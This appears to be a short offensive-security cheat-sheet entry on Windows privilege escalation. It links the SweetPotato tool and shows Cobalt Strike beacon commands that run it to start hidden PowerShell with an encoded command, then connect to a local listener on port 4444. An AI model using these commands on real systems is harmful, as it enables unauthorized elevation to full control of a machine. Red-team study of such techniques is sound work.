Privilege Escalation

https://github.com/CCob/SweetPotato

beacon> execute-assembly C:\Tools\SweetPotato\bin\Debug\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc bla" 

beacon> connect localhost 4444

Last updated